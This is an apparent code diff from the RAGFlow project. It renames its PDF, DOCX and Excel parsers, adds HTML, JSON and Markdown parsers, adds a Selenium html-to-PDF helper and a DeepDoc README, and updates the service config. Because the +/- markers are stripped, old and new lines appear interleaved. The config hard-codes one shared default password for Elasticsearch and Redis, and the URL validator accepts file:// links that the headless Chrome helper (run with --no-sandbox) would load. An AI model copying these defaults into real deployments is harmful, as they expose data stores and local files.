@@ -155,17 +164,17 @@ def filename_type(filename):
        return FileType.AURAL.value

    if re.match(r".*\.(jpg|jpeg|png|tif|gif|pcx|tga|exif|fpx|svg|psd|cdr|pcd|dxf|ufo|eps|ai|raw|WMF|webp|avif|apng|icon|ico|mpg|mpeg|avi|rm|rmvb|mov|wmv|asf|dat|asx|wvx|mpe|mpa|mp4)$", filename):
        return FileType.VISUAL
        return FileType.VISUAL.value

    return FileType.OTHER.value


def thumbnail(filename, blob):
    filename = filename.lower()
    if re.match(r".*\.pdf$", filename):
        pdf = fitz.open(stream=blob, filetype="pdf")
        pix = pdf[0].get_pixmap(matrix=fitz.Matrix(0.03, 0.03))
        pdf = pdfplumber.open(BytesIO(blob))
        buffered = BytesIO()
        Image.frombytes("RGB", [pix.width, pix.height],
                        pix.samples).save(buffered, format="png")
        pdf.pages[0].to_image(resolution=32).annotated.save(buffered, format="png")
        return "data:image/png;base64," + \
            base64.b64encode(buffered.getvalue()).decode("utf-8")

api/utils/web_utils.py (new file, 80 lines)
@@ -0,0 +1,80 @@
import re
import json
import base64

from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.chrome.service import Service
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support.expected_conditions import staleness_of
from webdriver_manager.chrome import ChromeDriverManager
from selenium.webdriver.common.by import By


def html2pdf(
        source: str,
        timeout: int = 2,
        install_driver: bool = True,
        print_options: dict = {},
):
    result = __get_pdf_from_html(source, timeout, install_driver, print_options)
    return result


def __send_devtools(driver, cmd, params={}):
    resource = "/session/%s/chromium/send_command_and_get_result" % driver.session_id
    url = driver.command_executor._url + resource
    body = json.dumps({"cmd": cmd, "params": params})
    response = driver.command_executor._request("POST", url, body)

    if not response:
        raise Exception(response.get("value"))

    return response.get("value")


def __get_pdf_from_html(
        path: str,
        timeout: int,
        install_driver: bool,
        print_options: dict
):
    webdriver_options = Options()
    webdriver_prefs = {}
    webdriver_options.add_argument("--headless")
    webdriver_options.add_argument("--disable-gpu")
    webdriver_options.add_argument("--no-sandbox")
    webdriver_options.add_argument("--disable-dev-shm-usage")
    webdriver_options.experimental_options["prefs"] = webdriver_prefs

    webdriver_prefs["profile.default_content_settings"] = {"images": 2}

    if install_driver:
        service = Service(ChromeDriverManager().install())
        driver = webdriver.Chrome(service=service, options=webdriver_options)
    else:
        driver = webdriver.Chrome(options=webdriver_options)

    driver.get(path)

    try:
        WebDriverWait(driver, timeout).until(
            staleness_of(driver.find_element(by=By.TAG_NAME, value="html"))
        )
    except TimeoutException:
        calculated_print_options = {
            "landscape": False,
            "displayHeaderFooter": False,
            "printBackground": True,
            "preferCSSPageSize": True,
        }
        calculated_print_options.update(print_options)
        result = __send_devtools(
            driver, "Page.printToPDF", calculated_print_options)
        driver.quit()
        return base64.b64decode(result["data"])


def is_valid_url(url: str) -> bool:
    return bool(re.match(r"(https?|ftp|file)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]+[-A-Za-z0-9+&@#/%=~_|]", url))
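For orientation, a minimal usage sketch of the new helper (the URL and output path are placeholders; a local Chrome installation is assumed, and the PDF bytes are produced once the page load settles):

```python
from api.utils.web_utils import html2pdf, is_valid_url

url = "https://example.com"  # placeholder target page
if is_valid_url(url):
    pdf_bytes = html2pdf(url, timeout=5)  # rendered via Chrome's Page.printToPDF
    with open("page.pdf", "wb") as f:     # placeholder output path
        f.write(pdf_bytes)
```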
@@ -14,17 +14,15 @@
# limitations under the License.
#
import os

import dotenv
import typing

from api.utils.file_utils import get_project_base_directory


def get_versions() -> typing.Mapping[str, typing.Any]:
    return dotenv.dotenv_values(
        dotenv_path=os.path.join(get_project_base_directory(), "rag.env")
    )
    dotenv.load_dotenv(dotenv.find_dotenv())
    return dotenv.dotenv_values()


def get_rag_version() -> typing.Optional[str]:
    return get_versions().get("RAG")
    return get_versions().get("RAGFLOW_VERSION", "dev")
@@ -1,7 +1,7 @@
{
    "settings": {
        "index": {
            "number_of_shards": 4,
            "number_of_shards": 2,
            "number_of_replicas": 0,
            "refresh_interval" : "1000ms"
        },

@@ -15,14 +15,27 @@ minio:
  host: 'minio:9000'
es:
  hosts: 'http://es01:9200'
  username: 'elastic'
  password: 'infini_rag_flow'
redis:
  db: 1
  password: 'infini_rag_flow'
  host: 'redis:6379'
user_default_llm:
  factory: 'Tongyi-Qianwen'
  api_key: 'sk-xxxxxxxxxxxxx'
  base_url: ''
oauth:
  github:
    client_id: xxxxxxxxxxxxxxxxxxxxxxxxx
    secret_key: xxxxxxxxxxxxxxxxxxxxxxxxxxxx
    url: https://github.com/login/oauth/access_token
  feishu:
    app_id: cli_xxxxxxxxxxxxxxxxxxx
    app_secret: xxxxxxxxxxxxxxxxxxxxxxxxxxxx
    app_access_token_url: https://open.feishu.cn/open-apis/auth/v3/app_access_token/internal
    user_access_token_url: https://open.feishu.cn/open-apis/authen/v1/oidc/access_token
    grant_type: 'authorization_code'
authentication:
  client:
    switch: false

@@ -1 +1,116 @@
[English](./README.md) | 简体中文

# *Deep*Doc

- [*Deep*Doc](#deepdoc)
  - [1. Introduction](#1-introduction)
  - [2. Vision processing](#2-vision-processing)
  - [3. Parsers](#3-parsers)
    - [Resume](#resume)

<a name="1"></a>
## 1. Introduction

For the mass of documents that come from different domains, in different formats, and with different retrieval requirements, accurate analysis is a very challenging task. *Deep*Doc was born for exactly that purpose. So far there are two components in *Deep*Doc: vision processing and parsers. If you are interested in our OCR, layout recognition, and TSR results, you can run the test programs below.

```bash
python deepdoc/vision/t_ocr.py -h
usage: t_ocr.py [-h] --inputs INPUTS [--output_dir OUTPUT_DIR]

options:
  -h, --help            show this help message and exit
  --inputs INPUTS       Directory where to store images or PDFs, or a file path to a single image or PDF
  --output_dir OUTPUT_DIR
                        Directory where to store the output images. Default: './ocr_outputs'
```

```bash
python deepdoc/vision/t_recognizer.py -h
usage: t_recognizer.py [-h] --inputs INPUTS [--output_dir OUTPUT_DIR] [--threshold THRESHOLD] [--mode {layout,tsr}]

options:
  -h, --help            show this help message and exit
  --inputs INPUTS       Directory where to store images or PDFs, or a file path to a single image or PDF
  --output_dir OUTPUT_DIR
                        Directory where to store the output images. Default: './layouts_outputs'
  --threshold THRESHOLD
                        A threshold to filter out detections. Default: 0.5
  --mode {layout,tsr}   Task mode: layout recognition or table structure recognition
```

Our models are served on HuggingFace. If you have trouble downloading HuggingFace models, this might help!

```bash
export HF_ENDPOINT=https://hf-mirror.com
```

<a name="2"></a>
## 2. Vision processing

As humans, we use visual information to solve problems.

- **OCR (Optical Character Recognition).** Since many documents are presented as images, or can at least be converted into images, OCR is a very important, fundamental, even universal solution for text extraction.

```bash
python deepdoc/vision/t_ocr.py --inputs=path_to_images_or_pdfs --output_dir=path_to_store_result
```

The inputs can be a directory of images or PDFs, or a single image or PDF file. You can look into the folder `path_to_store_result`, where there are images demonstrating the positions of the results, together with txt files containing the OCR text.

<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/12318111/f25bee3d-aaf7-4102-baf5-d5208361d110" width="900"/>
</div>

- **Layout recognition.** Documents from different domains may have different layouts: newspapers, magazines, books, and resumes all differ in how they are laid out. Only with an accurate layout analysis can a machine decide whether text parts are contiguous or not, whether a part needs Table Structure Recognition (TSR) processing, or whether a component is a figure described by a nearby caption. We have 10 basic layout components that cover most cases:
  - Text
  - Title
  - Figure
  - Figure caption
  - Table
  - Table caption
  - Header
  - Footer
  - Reference
  - Equation

Try the following command to see the layout detection results.

```bash
python deepdoc/vision/t_recognizer.py --inputs=path_to_images_or_pdfs --threshold=0.2 --mode=layout --output_dir=path_to_store_result
```

The inputs can be a directory of images or PDFs, or a single image or PDF file. You can look into the folder `path_to_store_result`, where there are images showing the detection results, as follows:

<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/12318111/07e0f625-9b28-43d0-9fbb-5bf586cd286f" width="1000"/>
</div>

- **TSR (Table Structure Recognition).** A data table is a frequently used structure for presenting data, including numbers and text. The structure of a table can be quite complicated, with hierarchical headers, spanning cells, and projected row headers. Beyond TSR, we also reassemble the table content into sentences that an LLM can understand well. The TSR task has five labels:
  - Column
  - Row
  - Column header
  - Projected row header
  - Spanning cell

Try the following command to see the detection results.

```bash
python deepdoc/vision/t_recognizer.py --inputs=path_to_images_or_pdfs --threshold=0.2 --mode=tsr --output_dir=path_to_store_result
```

The inputs can be a directory of images or PDFs, or a single image or PDF file. You can look into the folder `path_to_store_result`, which contains both images and HTML pages presenting the detection results, as follows:

<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/12318111/cb24e81b-f2ba-49f3-ac09-883d75606f4c" width="1000"/>
</div>

<a name="3"></a>
## 3. Parsers

Four document formats (PDF, DOCX, EXCEL, and PPT) have corresponding parsers. The most complex one is the PDF parser, since PDF is so flexible. The outputs of the PDF parser include:
- Text chunks with their own positions in the PDF (page number and rectangular position).
- Tables cropped as images from the PDF, with contents already translated into natural-language sentences.
- Figures with their captions and the text inside the figures.

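As a rough sketch of the parser interface (not official documentation; the file name is a placeholder, and the call signature follows the DOCX parser shown later in this changeset):

```python
from deepdoc.parser import DocxParser

parser = DocxParser()
# Returns (sections, tables): sections are (paragraph_text, style_name)
# pairs, tables hold the extracted table contents.
secs, tbls = parser("sample.docx", from_page=0, to_page=100000)
```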
### Resume

A resume is a very complicated kind of document. A resume composed of unstructured text in all kinds of layouts can be resolved into structured data made up of nearly a hundred fields. We haven't open-sourced the parser itself, since we open-source the processing method that runs after the parsing procedure.

@@ -1,6 +1,20 @@
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#


from .pdf_parser import HuParser as PdfParser, PlainParser
from .docx_parser import HuDocxParser as DocxParser
from .excel_parser import HuExcelParser as ExcelParser
from .ppt_parser import HuPptParser as PptParser
from .pdf_parser import RAGFlowPdfParser as PdfParser, PlainParser
from .docx_parser import RAGFlowDocxParser as DocxParser
from .excel_parser import RAGFlowExcelParser as ExcelParser
from .ppt_parser import RAGFlowPptParser as PptParser
from .html_parser import RAGFlowHtmlParser as HtmlParser
from .json_parser import RAGFlowJsonParser as JsonParser
from .markdown_parser import RAGFlowMarkdownParser as MarkdownParser
@@ -1,13 +1,25 @@
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

from docx import Document
import re
import pandas as pd
from collections import Counter
from rag.nlp import huqie
from rag.nlp import rag_tokenizer
from io import BytesIO


class HuDocxParser:
class RAGFlowDocxParser:

    def __extract_table_content(self, tb):
        df = []
@@ -35,14 +47,14 @@ class HuDocxParser:
            for p, n in patt:
                if re.search(p, b):
                    return n
            tks = [t for t in huqie.qie(b).split(" ") if len(t) > 1]
            tks = [t for t in rag_tokenizer.tokenize(b).split(" ") if len(t) > 1]
            if len(tks) > 3:
                if len(tks) < 12:
                    return "Tx"
                else:
                    return "Lx"

            if len(tks) == 1 and huqie.tag(tks[0]) == "nr":
            if len(tks) == 1 and rag_tokenizer.tag(tks[0]) == "nr":
                return "Nr"

            return "Ot"
@@ -101,19 +113,24 @@ class HuDocxParser:
    def __call__(self, fnm, from_page=0, to_page=100000):
        self.doc = Document(fnm) if isinstance(
            fnm, str) else Document(BytesIO(fnm))
        pn = 0
        secs = []
        pn = 0  # parsed page
        secs = []  # parsed contents
        for p in self.doc.paragraphs:
            if pn > to_page:
                break
            if from_page <= pn < to_page and p.text.strip():
                secs.append((p.text, p.style.name))

            runs_within_single_paragraph = []  # save runs within the range of pages
            for run in p.runs:
                if 'lastRenderedPageBreak' in run._element.xml:
                    pn += 1
                    continue
                if 'w:br' in run._element.xml and 'type="page"' in run._element.xml:
                if pn > to_page:
                    break
                if from_page <= pn < to_page and p.text.strip():
                    runs_within_single_paragraph.append(run.text)  # append run.text first

                # wrap the page-break checker into a static method
                if RAGFlowDocxParser.has_page_break(run._element.xml):
                    pn += 1

            secs.append(("".join(runs_within_single_paragraph), p.style.name))  # then concat run.text as part of the paragraph

        tbls = [self.__extract_table_content(tb) for tb in self.doc.tables]
        return secs, tbls

@@ -1,25 +1,46 @@
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

from openpyxl import load_workbook
import sys
from io import BytesIO

from rag.nlp import find_codec


class HuExcelParser:
    def html(self, fnm):

class RAGFlowExcelParser:
    def html(self, fnm, chunk_rows=256):
        if isinstance(fnm, str):
            wb = load_workbook(fnm)
        else:
            wb = load_workbook(BytesIO(fnm))
        tb = ""

        tb_chunks = []
        for sheetname in wb.sheetnames:
            ws = wb[sheetname]
            rows = list(ws.rows)
            if not rows:continue
            tb += f"<table><caption>{sheetname}</caption><tr>"
            if not rows: continue

            tb_rows_0 = "<tr>"
            for t in list(rows[0]):
                tb += f"<th>{t.value}</th>"
            tb += "</tr>"
            for r in list(rows[1:]):
                tb_rows_0 += f"<th>{t.value}</th>"
            tb_rows_0 += "</tr>"

            for chunk_i in range((len(rows) - 1) // chunk_rows + 1):
                tb = ""
                tb += f"<table><caption>{sheetname}</caption>"
                tb += tb_rows_0
                for r in list(rows[1 + chunk_i * chunk_rows:1 + (chunk_i + 1) * chunk_rows]):
                    tb += "<tr>"
                    for i, c in enumerate(r):
                        if c.value is None:
@@ -28,7 +49,9 @@ class HuExcelParser:
                            tb += f"<td>{c.value}</td>"
                    tb += "</tr>"
                tb += "</table>\n"
        return tb
                tb_chunks.append(tb)

        return tb_chunks

    def __call__(self, fnm):
        if isinstance(fnm, str):
@@ -66,10 +89,11 @@ class HuExcelParser:
            return total

        if fnm.split(".")[-1].lower() in ["csv", "txt"]:
            txt = binary.decode("utf-8")
            encoding = find_codec(binary)
            txt = binary.decode(encoding, errors="ignore")
            return len(txt.split("\n"))


if __name__ == "__main__":
    psr = HuExcelParser()
    psr = RAGFlowExcelParser()
    psr(sys.argv[1])

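A minimal usage sketch for the chunked HTML rendering introduced above (the workbook path is a placeholder):

```python
from deepdoc.parser.excel_parser import RAGFlowExcelParser

parser = RAGFlowExcelParser()
# html() now returns a list of <table> chunks, each holding at most
# chunk_rows data rows plus the repeated header row.
for chunk in parser.html("book.xlsx", chunk_rows=256):
    print(chunk[:80])
```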
deepdoc/parser/html_parser.py (new file, 39 lines)
@@ -0,0 +1,39 @@
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from rag.nlp import find_codec
import readability
import html_text
import chardet


def get_encoding(file):
    with open(file, 'rb') as f:
        tmp = chardet.detect(f.read())
        return tmp['encoding']


class RAGFlowHtmlParser:
    def __call__(self, fnm, binary=None):
        txt = ""
        if binary:
            encoding = find_codec(binary)
            txt = binary.decode(encoding, errors="ignore")
        else:
            with open(fnm, "r", encoding=get_encoding(fnm)) as f:
                txt = f.read()

        html_doc = readability.Document(txt)
        title = html_doc.title()
        content = html_text.extract_text(html_doc.summary(html_partial=True))
        txt = f'{title}\n{content}'
        sections = txt.split("\n")
        return sections
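A minimal usage sketch for the new HTML parser (the path is a placeholder; raw bytes can be passed via `binary=` instead):

```python
from deepdoc.parser.html_parser import RAGFlowHtmlParser

parser = RAGFlowHtmlParser()
sections = parser("page.html")
print(sections[0])  # the readability-extracted title comes first
```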
deepdoc/parser/json_parser.py (new file, 116 lines)
@@ -0,0 +1,116 @@
# -*- coding: utf-8 -*-
# The following document is mainly referenced, and only adaptation modifications have been made:
# https://github.com/langchain-ai/langchain/blob/master/libs/text-splitters/langchain_text_splitters/json.py

import json
from typing import Any, Dict, List, Optional
from rag.nlp import find_codec


class RAGFlowJsonParser:
    def __init__(
            self, max_chunk_size: int = 2000, min_chunk_size: Optional[int] = None
    ):
        super().__init__()
        self.max_chunk_size = max_chunk_size * 2
        self.min_chunk_size = (
            min_chunk_size
            if min_chunk_size is not None
            else max(max_chunk_size - 200, 50)
        )

    def __call__(self, binary):
        encoding = find_codec(binary)
        txt = binary.decode(encoding, errors="ignore")
        json_data = json.loads(txt)
        chunks = self.split_json(json_data, True)
        sections = [json.dumps(l, ensure_ascii=False) for l in chunks if l]
        return sections

    @staticmethod
    def _json_size(data: Dict) -> int:
        """Calculate the size of the serialized JSON object."""
        return len(json.dumps(data, ensure_ascii=False))

    @staticmethod
    def _set_nested_dict(d: Dict, path: List[str], value: Any) -> None:
        """Set a value in a nested dictionary based on the given path."""
        for key in path[:-1]:
            d = d.setdefault(key, {})
        d[path[-1]] = value

    def _list_to_dict_preprocessing(self, data: Any) -> Any:
        if isinstance(data, dict):
            # Process each key-value pair in the dictionary
            return {k: self._list_to_dict_preprocessing(v) for k, v in data.items()}
        elif isinstance(data, list):
            # Convert the list to a dictionary with index-based keys
            return {
                str(i): self._list_to_dict_preprocessing(item)
                for i, item in enumerate(data)
            }
        else:
            # Base case: the item is neither a dict nor a list, so return it unchanged
            return data

    def _json_split(
            self,
            data: Dict[str, Any],
            current_path: Optional[List[str]] = None,
            chunks: Optional[List[Dict]] = None,
    ) -> List[Dict]:
        """
        Split json into maximum size dictionaries while preserving structure.
        """
        current_path = current_path or []
        chunks = chunks or [{}]
        if isinstance(data, dict):
            for key, value in data.items():
                new_path = current_path + [key]
                chunk_size = self._json_size(chunks[-1])
                size = self._json_size({key: value})
                remaining = self.max_chunk_size - chunk_size

                if size < remaining:
                    # Add item to current chunk
                    self._set_nested_dict(chunks[-1], new_path, value)
                else:
                    if chunk_size >= self.min_chunk_size:
                        # Chunk is big enough, start a new chunk
                        chunks.append({})

                    # Iterate
                    self._json_split(value, new_path, chunks)
        else:
            # handle single item
            self._set_nested_dict(chunks[-1], current_path, data)
        return chunks

    def split_json(
            self,
            json_data: Dict[str, Any],
            convert_lists: bool = False,
    ) -> List[Dict]:
        """Splits JSON into a list of JSON chunks"""

        if convert_lists:
            chunks = self._json_split(self._list_to_dict_preprocessing(json_data))
        else:
            chunks = self._json_split(json_data)

        # Remove the last chunk if it's empty
        if not chunks[-1]:
            chunks.pop()
        return chunks

    def split_text(
            self,
            json_data: Dict[str, Any],
            convert_lists: bool = False,
            ensure_ascii: bool = True,
    ) -> List[str]:
        """Splits JSON into a list of JSON formatted strings"""

        chunks = self.split_json(json_data=json_data, convert_lists=convert_lists)

        # Convert to string
        return [json.dumps(chunk, ensure_ascii=ensure_ascii) for chunk in chunks]
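A minimal usage sketch for the new JSON splitter (the payload is a toy example):

```python
from deepdoc.parser.json_parser import RAGFlowJsonParser

parser = RAGFlowJsonParser(max_chunk_size=2000)
payload = b'{"a": {"b": 1, "c": [1, 2, 3]}}'
# Lists are converted to index-keyed dicts, the tree is split into
# size-bounded chunks, and each chunk is serialized back to JSON.
sections = parser(payload)
print(sections)
```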
deepdoc/parser/markdown_parser.py (new file, 44 lines)
@@ -0,0 +1,44 @@
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import re


class RAGFlowMarkdownParser:
    def __init__(self, chunk_token_num=128):
        self.chunk_token_num = int(chunk_token_num)

    def extract_tables_and_remainder(self, markdown_text):
        # Standard Markdown table
        table_pattern = re.compile(
            r'''
            (?:\n|^)
            (?:\|.*?\|.*?\|.*?\n)
            (?:\|(?:\s*[:-]+[-| :]*\s*)\|.*?\n)
            (?:\|.*?\|.*?\|.*?\n)+
            ''', re.VERBOSE)
        tables = table_pattern.findall(markdown_text)
        remainder = table_pattern.sub('', markdown_text)

        # Borderless Markdown table
        no_border_table_pattern = re.compile(
            r'''
            (?:\n|^)
            (?:\S.*?\|.*?\n)
            (?:(?:\s*[:-]+[-| :]*\s*).*?\n)
            (?:\S.*?\|.*?\n)+
            ''', re.VERBOSE)
        no_border_tables = no_border_table_pattern.findall(remainder)
        tables.extend(no_border_tables)
        remainder = no_border_table_pattern.sub('', remainder)

        return remainder, tables
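A minimal usage sketch for the table extraction above (the Markdown snippet is a toy example):

```python
from deepdoc.parser.markdown_parser import RAGFlowMarkdownParser

parser = RAGFlowMarkdownParser()
md = "intro text\n| a | b |\n| --- | --- |\n| 1 | 2 |\n"
remainder, tables = parser.extract_tables_and_remainder(md)
# remainder keeps the prose; tables holds the matched Markdown tables
```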
@@ -1,8 +1,19 @@
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

import os
import random

import fitz
import xgboost as xgb
from io import BytesIO
import torch
@@ -11,19 +22,19 @@ import pdfplumber
import logging
from PIL import Image, ImageDraw
import numpy as np

from timeit import default_timer as timer
from PyPDF2 import PdfReader as pdf2_read

from api.utils.file_utils import get_project_base_directory
from deepdoc.vision import OCR, Recognizer, LayoutRecognizer, TableStructureRecognizer
from rag.nlp import huqie
from rag.nlp import rag_tokenizer
from copy import deepcopy
from huggingface_hub import snapshot_download

logging.getLogger("pdfminer").setLevel(logging.WARNING)


class HuParser:
class RAGFlowPdfParser:
    def __init__(self):
        self.ocr = OCR()
        if hasattr(self, "model_speciess"):
@@ -43,11 +54,12 @@ class HuParser:
                model_dir, "updown_concat_xgb.model"))
        except Exception as e:
            model_dir = snapshot_download(
                repo_id="InfiniFlow/text_concat_xgb_v1.0")
                repo_id="InfiniFlow/text_concat_xgb_v1.0",
                local_dir=os.path.join(get_project_base_directory(), "rag/res/deepdoc"),
                local_dir_use_symlinks=False)
            self.updown_cnt_mdl.load_model(os.path.join(
                model_dir, "updown_concat_xgb.model"))

        self.page_from = 0
        """
        If you have trouble downloading HuggingFace models, -_^ this might help!!
@@ -62,7 +74,7 @@ class HuParser:
        """

    def __char_width(self, c):
        return (c["x1"] - c["x0"]) // len(c["text"])
        return (c["x1"] - c["x0"]) // max(len(c["text"]), 1)

    def __height(self, c):
        return c["bottom"] - c["top"]
@@ -94,13 +106,13 @@ class HuParser:
        h = max(self.__height(up), self.__height(down))
        y_dis = self._y_dis(up, down)
        LEN = 6
        tks_down = huqie.qie(down["text"][:LEN]).split(" ")
        tks_up = huqie.qie(up["text"][-LEN:]).split(" ")
        tks_down = rag_tokenizer.tokenize(down["text"][:LEN]).split(" ")
        tks_up = rag_tokenizer.tokenize(up["text"][-LEN:]).split(" ")
        tks_all = up["text"][-LEN:].strip() \
            + (" " if re.match(r"[a-zA-Z0-9]+",
                               up["text"][-1] + down["text"][0]) else "") \
            + down["text"][:LEN].strip()
        tks_all = huqie.qie(tks_all).split(" ")
        tks_all = rag_tokenizer.tokenize(tks_all).split(" ")
        fea = [
            up.get("R", -1) == down.get("R", -1),
            y_dis / h,
@@ -141,8 +153,8 @@ class HuParser:
            tks_down[-1] == tks_up[-1],
            max(down["in_row"], up["in_row"]),
            abs(down["in_row"] - up["in_row"]),
            len(tks_down) == 1 and huqie.tag(tks_down[0]).find("n") >= 0,
            len(tks_up) == 1 and huqie.tag(tks_up[0]).find("n") >= 0
            len(tks_down) == 1 and rag_tokenizer.tag(tks_down[0]).find("n") >= 0,
            len(tks_up) == 1 and rag_tokenizer.tag(tks_up[0]).find("n") >= 0
        ]
        return fea

@@ -392,11 +404,11 @@ class HuParser:
            b["text"].strip()[-1] in ",;:'\",、‘“;:-",
            len(b["text"].strip()) > 1 and b["text"].strip(
            )[-2] in ",;:'\",‘“、;:",
            b["text"].strip()[0] in "。;?!?”)),,、:",
            b_["text"].strip() and b_["text"].strip()[0] in "。;?!?”)),,、:",
        ]
        # features for not concating
        feats = [
            b.get("layoutno", 0) != b.get("layoutno", 0),
            b.get("layoutno", 0) != b_.get("layoutno", 0),
            b["text"].strip()[-1] in "。?!?",
            self.is_english and b["text"].strip()[-1] in ".!?",
            b["page_number"] == b_["page_number"] and b_["top"] -
@@ -469,7 +481,8 @@ class HuParser:
                continue

            if re.match(r"[0-9]{2,3}/[0-9]{3}$", up["text"]) \
                    or re.match(r"[0-9]{2,3}/[0-9]{3}$", down["text"]):
                    or re.match(r"[0-9]{2,3}/[0-9]{3}$", down["text"]) \
                    or not down["text"].strip():
                i += 1
                continue

@@ -597,7 +610,7 @@ class HuParser:

            if b["text"].strip()[0] != b_["text"].strip()[0] \
                    or b["text"].strip()[0].lower() in set("qwertyuopasdfghjklzxcvbnm") \
                    or huqie.is_chinese(b["text"].strip()[0]) \
                    or rag_tokenizer.is_chinese(b["text"].strip()[0]) \
                    or b["top"] > b_["bottom"]:
                i += 1
                continue
@@ -748,6 +761,7 @@ class HuParser:
                                                  "layoutno", "")))

            left, top, right, bott = b["x0"], b["top"], b["x1"], b["bottom"]
            if right < left: right = left + 1
            poss.append((pn + self.page_from, left, right, top, bott))
        return self.page_images[pn] \
            .crop((left * ZM, top * ZM,
@@ -828,9 +842,13 @@ class HuParser:
        pn = [bx["page_number"]]
        top = bx["top"] - self.page_cum_height[pn[0] - 1]
        bott = bx["bottom"] - self.page_cum_height[pn[0] - 1]
        page_images_cnt = len(self.page_images)
        if pn[-1] - 1 >= page_images_cnt: return ""
        while bott * ZM > self.page_images[pn[-1] - 1].size[1]:
            bott -= self.page_images[pn[-1] - 1].size[1] / ZM
            pn.append(pn[-1] + 1)
            if pn[-1] - 1 >= page_images_cnt:
                return ""

        return "@@{}\t{:.1f}\t{:.1f}\t{:.1f}\t{:.1f}##" \
            .format("-".join([str(p) for p in pn]),
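For consumers of these position markers, a small parsing sketch. Assumptions: the tag layout follows the format string above, and — per the `(pn, left, right, top, bott)` tuples built in the crop path earlier — the four floats are left, right, top, bottom; the `.format()` call is truncated by this hunk, so treat that ordering as unverified:

```python
import re

TAG = re.compile(r"@@([0-9-]+)\t([0-9.]+)\t([0-9.]+)\t([0-9.]+)\t([0-9.]+)##")

def parse_position_tags(text):
    # Pages are "-"-joined ints; coordinates are the four tab-separated floats.
    for m in TAG.finditer(text):
        pages = [int(p) for p in m.group(1).split("-")]
        left, right, top, bottom = map(float, m.groups()[1:])
        yield pages, left, right, top, bottom
```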
@@ -916,9 +934,7 @@ class HuParser:
                fnm) if not binary else pdfplumber.open(BytesIO(binary))
            return len(pdf.pages)
        except Exception as e:
            pdf = fitz.open(fnm) if not binary else fitz.open(
                stream=fnm, filetype="pdf")
            return len(pdf)
            logging.error(str(e))

    def __images__(self, fnm, zoomin=3, page_from=0,
                   page_to=299, callback=None):
@@ -930,32 +946,17 @@ class HuParser:
        self.page_cum_height = [0]
        self.page_layout = []
        self.page_from = page_from
        st = timer()
        try:
            self.pdf = pdfplumber.open(fnm) if isinstance(
                fnm, str) else pdfplumber.open(BytesIO(fnm))
            self.page_images = [p.to_image(resolution=72 * zoomin).annotated for i, p in
                                enumerate(self.pdf.pages[page_from:page_to])]
            self.page_chars = [[c for c in page.chars if self._has_color(c)] for page in
            self.page_chars = [[{**c, 'top': max(0, c['top'] - 10), 'bottom': max(0, c['bottom'] - 10)} for c in page.chars if self._has_color(c)] for page in
                               self.pdf.pages[page_from:page_to]]
            self.total_page = len(self.pdf.pages)
        except Exception as e:
            self.pdf = fitz.open(fnm) if isinstance(
                fnm, str) else fitz.open(
                stream=fnm, filetype="pdf")
            self.page_images = []
            self.page_chars = []
            mat = fitz.Matrix(zoomin, zoomin)
            self.total_page = len(self.pdf)
            for i, page in enumerate(self.pdf):
                if i < page_from:
                    continue
                if i >= page_to:
                    break
                pix = page.get_pixmap(matrix=mat)
                img = Image.frombytes("RGB", [pix.width, pix.height],
                                      pix.samples)
                self.page_images.append(img)
                self.page_chars.append([])
            logging.error(str(e))

        self.outlines = []
        try:
@@ -968,6 +969,7 @@ class HuParser:
                    self.outlines.append((a["/Title"], depth))
                    continue
                dfs(a, depth + 1)

            dfs(outlines, 0)
        except Exception as e:
            logging.warning(f"Outlines exception: {e}")
@@ -983,7 +985,9 @@ class HuParser:
            self.is_english = True
        else:
            self.is_english = False
        self.is_english = False

        st = timer()
        for i, img in enumerate(self.page_images):
            chars = self.page_chars[i] if not self.is_english else []
            self.mean_height.append(
@@ -1001,15 +1005,11 @@ class HuParser:
